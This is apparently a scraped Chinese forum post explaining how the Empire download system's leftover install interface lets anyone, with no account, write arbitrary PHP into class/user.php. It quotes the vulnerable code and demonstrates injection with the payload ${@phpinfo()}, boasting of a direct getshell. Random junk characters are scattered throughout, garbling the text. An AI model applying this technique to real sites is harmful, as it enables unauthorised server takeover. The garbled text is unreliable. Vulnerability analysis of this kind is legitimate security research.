这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们
+ \8 c& a |- \5 A% }% x9 a. r, `4 a5 d6 q9 @4 C& V% R
2 i0 l, Q6 T: ~: w6 B+ C
这是帝国的一套下载系统 如图7 f) v1 ]- Y8 G
ps(不需要任何账户和密码,直接写shell)
! K O; N' m# s' R由于很多站是由于下载要整合discuz 等等一些论坛....' W- B+ a) g# a( k, G6 }9 H
$ {( Q6 _; `( ], M+ s而帝国他又有一个万能接口,如图 " y' T, _8 s6 s: [- f
: o& S3 p3 k1 k6 n
$ h. w4 ^9 P8 A9 }7 w而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码
2 u3 h+ n# q$ L% d# u P( h6 r) Z7 G, ^# t% S+ ?1 H& s" X |
当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪4 @/ \4 E N: I, q- |
) {/ C; f* a7 a
在data/fun.php中的15行
( K! o p# P* f8 c. s' s% |( l( G! H% p- c; `% `2 c0 g
我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. {
7 l1 E$ @3 d9 p* @ F17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干
7 g( U* X7 j2 V5 j0 Z2 Y) p( @: u o0 i# h0 U; W' ?
这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);$ J4 p4 z, B$ c. j5 i1 d6 a
- n% S7 X' P3 W- \. A- B他将传进来的变量进行了切割,然后赋给了$filetext+ k: g! E# e. q+ T" O
) m/ q: R& Z! v2 K) z: j2 k
然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了# d4 j6 @8 X6 Q' Y
/ j1 j1 g/ x6 ^* e% i我们看看写入的结果,随便填一个 $ M+ q6 _& j+ z2 M6 p
% ]& E+ I K6 C
6 w) Q% U5 ]. h" s% P2 |! j8 ^$ L
! p% A3 t6 e& K9 ]/ q* X; X: m5 Q5 e% B+ ?. R( W
' H1 e+ E L5 R4 F& g/ t
( _: h1 u5 q/ q+ Y; e7 l7 X" ?/ C% z( F# n% d
: `1 L! q# \& t6 G0 e6 \
' g; D8 {3 w, J/ f
& v. l; D$ Z3 D G/ f* |4 C/ S) o' T3 L: l" b
a) h7 X) E- u2 J
% V" Q+ |5 B4 ^8 |
) M2 F: [% O7 f% }- ]* Q# L# s. V/ [4 O
t+ S$ [ T9 Q' I( g& w( M% B) N, g4 z0 v! B9 D
# j! M* j% w8 r$ V; S# S- \8 A6 \% L/ j! w* \1 p
; w6 \( s, U! ]: D: q7 O( h9 A1 G. e! E
所以我们淫荡点,写个${@phpinfo()}试试 + R3 \& e4 B5 } S2 [, v
然后访问以下class/user.php这个文件
: T( V6 R: ?& N; a8 M2 h日了吧 3 G% o6 g; v5 D3 {0 d! _% c1 w
/ ?8 N/ Y% F( Y+ T' }$ g, M) Y' H$ L) f* f
: p( _5 y, u# |: a" V
: {9 j1 ~/ `0 f: N+ I' R
+ f6 ~" o; U! P& L; u% l9 @. m6 q |